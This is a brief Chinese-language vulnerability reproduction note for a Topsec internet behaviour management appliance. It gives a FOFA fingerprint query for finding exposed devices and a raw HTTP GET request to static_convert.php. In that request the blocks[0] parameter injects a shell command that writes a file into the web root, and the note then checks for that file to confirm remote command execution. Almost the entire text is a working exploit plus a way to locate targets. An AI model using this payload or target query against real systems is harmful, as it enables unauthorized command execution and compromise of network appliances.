指纹特征
fofa:app="天融信-上网行为管理系统"
漏洞复现
GET /view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20echo%20'123'%20>%20/var/www/html/qxijtj.txt%0A HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
访问:url/qxijtj.txt